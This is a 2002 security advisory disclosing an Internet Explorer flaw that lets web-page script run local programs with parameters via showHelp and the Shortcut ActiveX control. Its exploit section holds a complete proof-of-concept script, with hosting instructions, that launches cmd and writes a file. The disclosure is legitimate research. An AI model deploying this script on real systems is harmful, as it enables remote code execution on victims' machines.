- Sandblad advisory #10 -
----------------------------------------------------------------
Title: "How to execute programs with parameters in IE"
Date: [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor: http://www.microsoft.com/
Impact: Javascript in "Internet zone" may
execute programs with parameters _ _
o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6
(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local computer
zone" with less restrictions.
In the past we have seen many vulnerabilities where script in the
"Internet zone" could access the "Local computer zone". The script could
do actions like:
- Read local files if the exact path is known and file can be opened by
IE.
- Execute local programs (exact path required) WITHOUT parameters using
the codebase attack.
It will be shown in this document how script in the "Local computer zone"
can actually be designed to run arbitrary programs WITH parameters (exact
path not needed). The technique used may open up far more dangerous
attacks than seen before.
(2) VENDOR STATUS:
==================
Microsoft was initially contacted 2002-10-04. After several mail
exchanges, their final response were that the technique used to run
programs with parameters from the "Local computer zone" was no security
vulnerability. A fix should instead be applied for all possibilities for
content in the "Internet zone" to access the "Local computer zone".
(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp window.
2. Open an url (must begin with http://) in a separate winhelp window.
Script in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.
After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").
In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilites to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5) is
trivial to achieve and will not affect the winhelp window for (2), since
it is opened in a different window by default.
Before MS02-055 was released by Microsoft the above were a lot more easier
to perform. (3) and (4) could then be skipped.
(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting" vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.
In order for not having to put script in 3 separate files I have combined
them into one single file. The script will check for text after the # sign
in the url to determine what to perform (url's hash). If your computer is
heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is not
set directly by IE.
INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The script will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.
TESTED:
Win2000 pro, XP, IE 6 (latest patches).
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
(5) Disclaimer:
===============
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
(6) Feedback:
=============
Please send suggestions and comments to: _ _
sandblad@acc.umu.se o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad, student in Engineering Physics and
Computing Science at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
